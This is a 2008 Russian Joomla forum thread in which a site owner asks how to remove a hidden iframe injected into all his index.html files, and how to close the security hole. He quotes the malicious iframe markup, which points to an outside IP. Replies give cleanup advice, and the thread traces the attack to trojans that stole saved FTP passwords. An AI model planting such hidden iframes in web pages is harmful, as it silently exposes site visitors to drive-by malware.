Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

Discussion in 'Вопросы безопасности' started by stratosfera, Jan 20, 2008.

  1. Offline

    stratosfera Недавно здесь

    Joined:
    Jan 20, 2008
    Messages:
    4
    Likes Received:
    0
    Столкнулся третий раз уже с эой проблемой. 2 разных хостинга.
    Во всех файлах index.html появился скрипт:
    <iframe src='http://68.178.194.64/tab.php' width='1' height='1' style='visibility: hidden;'></iframe>
    Как можно вычестить его не прибегая к переустановки архива сайта?
    Где эти дырки и можно ли их закрыть?
    Связано ли это с атрибутами файлов на сервере? (то того как я не поменял атрибуты (разрешил перезапись) все было нормально)
    Подскажите, кто решал уже эти проблемы пожалуста.
    Версия джумлы 1.0.12 RE
    Установленые компоненты и модули:

    JOOMLA_com_easybook_1.1_stable_easy-joomla
    Joomlaboard_1[1].1.5.2_full_re
    mod_analogclock
     
    stratosfera, Jan 20, 2008
    #1

  2. Ads Master

     
  3. Dead Krolik
    Offline

    Dead Krolik Недавно здесь => Cпециалист <=

    Joined:
    Apr 13, 2007
    Messages:
    3,685
    Likes Received:
    101
    Gender:
    Male
    Ответ: Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

    Как найти зараженный файл - рассказано в факе. Как найти дырки - уже сложнее. Надо смотреть сайты соответствующих компонент что бы выяснить через что поломали.
     
    Dead Krolik, Jan 20, 2008
    #2
  4. Offline

    stratosfera Недавно здесь

    Joined:
    Jan 20, 2008
    Messages:
    4
    Likes Received:
    0
    Ответ: Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

    Так искать вроде и не надо, все же файлы переделаны index.html. Как их вычестить? Вручную по одному или есть другой способ?
    а ссылку на фак можно?

    Добавлено через 23 часа 56 минут
    Никто не поможет советом? Ребятки помощь нужна, поделитесь опытом пожалуйста. Я недавно занимаюсь разработкой на джумле и опыта совсем нету...
     
    Last edited: Jan 21, 2008
    stratosfera, Jan 21, 2008
    #3
  5. Fanamura
    Offline

    Fanamura Доброта

    Joined:
    Mar 12, 2007
    Messages:
    5,094
    Likes Received:
    158
    Gender:
    Male
    Ответ: Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

    Открываете зараженные файлы в редакторе, удаляете код, сохраняете:)
    ==
    ССЫЛКА НА FAQ
     
    Fanamura, Jan 21, 2008
    #4
  6. OlegM
    Offline

    OlegM Russian Joomla! Team Staff Member

    Joined:
    Apr 12, 2007
    Messages:
    4,310
    Likes Received:
    375
    Gender:
    Male
    Ответ: Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

    ну проще то заново записать эти файлы
     
    OlegM, Jan 21, 2008
    #5
  7. Offline

    stratosfera Недавно здесь

    Joined:
    Jan 20, 2008
    Messages:
    4
    Likes Received:
    0
    Ответ: Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

     
    stratosfera, Jan 21, 2008
    #6
  8. chilly_bang
    Offline

    chilly_bang Недавно здесь => Cпециалист <=

    Joined:
    Apr 30, 2006
    Messages:
    1,541
    Likes Received:
    38
    Gender:
    Male
    Ответ: Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

    сохрани дамп базы данных, переинсталлируй всё.
     
    chilly_bang, Jan 22, 2008
    #7
  9. Offline

    stratosfera Недавно здесь

    Joined:
    Jan 20, 2008
    Messages:
    4
    Likes Received:
    0
    Ответ: Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

    Слил сайт к себе на локальную машину, вычестил все файлы с помощью редактора
    Залил все обратно, все вроде работает. Проверил свой комп другим антивирусом и нашел пару троянов.
    Хостеры посоветовали не хранить пароли в тотале, потому что именно эти трояны и могли воспользовать паролями для изменения скрипта.
     
    stratosfera, Jan 22, 2008
    #8
  10. OlegM
    Offline

    OlegM Russian Joomla! Team Staff Member

    Joined:
    Apr 12, 2007
    Messages:
    4,310
    Likes Received:
    375
    Gender:
    Male
    Ответ: Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

    Просто надо пользоваться правильным антивирусом с обновляемыми базами, а осла IE давно пора отправить в топку.
     
    OlegM, Jan 22, 2008
    #9
  11. Offline

    kuzmitch Недавно здесь

    Joined:
    Feb 6, 2008
    Messages:
    77
    Likes Received:
    1
    Gender:
    Male
    Ответ: Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

    Если скрипт появится снова гляди сюда! там мое последнее сообщение мот поможет в твоей проблеме! http://joomla-support.ru/thread/3370/
     
    Last edited by a moderator: Mar 31, 2014
    kuzmitch, Feb 7, 2008
    #10
  12. RoMcHuS
    Offline

    RoMcHuS Пользователь

    Joined:
    Nov 6, 2006
    Messages:
    34
    Likes Received:
    0
    Gender:
    Male
    Ответ: Как вычестить левый скрипт из файлов записаный при атаке? И как закрыть эти дыры в джумле?

    Вообще это может быть только из-за дырявого хостинга или из-за вирусняков на своейже машине, прям при закачке и меняет в коде... касперыч помогает...

    а для быстрой замены есть программка, которая ищет файлы с куском кода и заменяет его нужный (например пробел)...
    Rename4u вроде
     
    RoMcHuS, Feb 7, 2008
    #11
< Восстановление паролья к админцентру (Super Administrator password) | Что сделать по минимуму для новичка для безопасности >

Share This Page

Loading...